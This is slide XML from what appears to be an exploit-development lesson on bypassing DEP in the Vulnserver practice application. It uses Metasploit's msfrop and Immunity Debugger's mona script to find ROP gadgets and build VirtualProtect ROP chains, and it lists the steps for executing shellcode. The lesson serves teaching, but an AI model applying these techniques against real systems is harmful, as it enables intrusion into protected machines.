              <a:t>We turned on DEP by selecting Turn on DEP for all programs and services except those I select. Let's restart our system and retry exploiting the same vulnerability, as follows:</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l"/>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>We can see that our exploit failed because the shellcode was not executed. You can download the example application from: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.thegreycorner.com/2010/12/introducing-vulnserver.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>we will see how we can bypass limitations posed by DEP using Metasploit and gain access to the protected systems. Let's keep DEP enabled, attach the same vulnerable application to the debugger, and check its executable modules, as follows:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-IN"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4961EF03-5892-ABB7-0AAD-21A73D36C8D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="175249" y="723124"/>
            <a:ext cx="6380122" cy="1880118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A5C8D2B-CD62-BEFF-F9BF-5E9BD685810E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="175249" y="3429001"/>
            <a:ext cx="4266122" cy="890341"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A179CACC-E821-E372-A2F4-A61EA59A2086}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="485192" y="5570849"/>
            <a:ext cx="6606073" cy="1128053"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3103934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3ED67E-796C-15C6-B7F1-A2148CF548E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="source-serif-pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{352863FD-12E4-95A0-A313-BAF63307FA2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="6555641"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" u="sng" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" u="sng" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>msfrop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" u="sng" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> to find ROP gadgets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Metasploit provides a very convenient tool to find ROP gadgets: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>msfrop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>. It not only enables us to list all the ROP gadgets but also allows us to search through those gadgets to find the appropriate gadgets for our required actions. Let's say we need to see all the gadgets that can help us to perform a pop operation over the ECX register. We can do this using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>msfrop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>, as follows:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>root@kali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msfrop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> –v –s “pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>” msvcrt.dll</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>As soon as we provide the -s switch for searching and -v for verbose output, we start getting a list of all the gadgets where the POP ECX instruction is used. Let's see the results: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How will the execution of instructions bypass hardware-enabled DEP protection?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>The answer is simple. The trick is to chain these ROP gadgets to call a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>VirtualProtect</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function, which is a memory protection function used to make the stack executable so that</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>the shellcode can execute. Let's look at the steps we need to perform to get the exploit to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>work under DEP protection:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1. Find the offset to the EIP register</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2. Overwrite the register with the first ROP gadget</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>3. Continue overwriting with the rest of the gadgets until the shellcode becomes executable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>4. Execute the shellcode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9865FF85-49CF-54FD-9EB4-1C59F72A6D60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="119976" y="2033672"/>
            <a:ext cx="8398873" cy="1773166"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="719470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3F8B46-6735-3832-6FF3-F9ADAC1863FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="7571303"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Using Mona to create ROP chains</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Using the Mona script from the Immunity Debugger, we can find ROP gadgets. However, it also provides functionality to create an entire ROP chain by itself, as shown in the following screenshot:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="source-serif-pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:latin typeface="source-serif-pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="source-serif-pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:latin typeface="source-serif-pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="source-serif-pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:latin typeface="source-serif-pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="source-serif-pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:latin typeface="source-serif-pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="source-serif-pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Using the !mona </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>rop</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dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> -cp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>nonull</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> command in the Immunity Debugger’s console, we can find all the relevant information about the ROP gadgets. We can see that we have the following files generated by the Mona script:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="source-serif-pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:latin typeface="source-serif-pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="source-serif-pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:latin typeface="source-serif-pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="source-serif-pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:latin typeface="source-serif-pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="source-serif-pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:latin typeface="source-serif-pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="source-serif-pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:latin typeface="source-serif-pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="source-serif-pro"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA85C0C3-75AF-B463-B52C-50E91B4D9E48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="923331"/>
            <a:ext cx="11586904" cy="2505669"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CB19A67-07D0-92F0-FB9D-3FB3C886CA20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3438331"/>
            <a:ext cx="45719" cy="331237"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BE6F83A-C948-1B08-612F-A63CEE047C90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="247653" y="4352330"/>
            <a:ext cx="8703841" cy="2309060"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="716958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E7E4F66-25E3-5C72-F8C3-76B8D044D58D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="5078313"/>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we have a file called rop_chains.txt, which contains the entire chain that can be used directly in the exploit module. This file contains the ROP chains created in Python, C, and Ruby for use in Metasploit already. All we need to do is copy the ROP chain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>into our exploit, and we are good to go. To create a ROP chain for triggering the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>VirtualProtect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>() function, we need the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>following setup of registers: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11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{054FE630-25BA-BCD6-ECC6-E767D3F9FA80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
